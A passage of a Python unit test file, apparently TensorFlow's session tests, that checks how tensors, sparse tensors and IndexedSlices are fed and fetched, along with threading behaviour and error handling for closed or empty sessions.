self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(
sp2, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(
sp, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(
sp2, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(
sp2, {sp: sparse_tensor.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32,
shape=shape,
name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [dtypes.float16,
dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64,
dtypes.complex128]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={feed_t: np_array}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={feed_t: np_array}))
# Also check that we can get both back.
out_v, feed_v = sess.run([out_t, feed_t],
feed_dict={feed_t: np_array})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(
42.0,
tensor_runner(41.0, options=run_options, run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
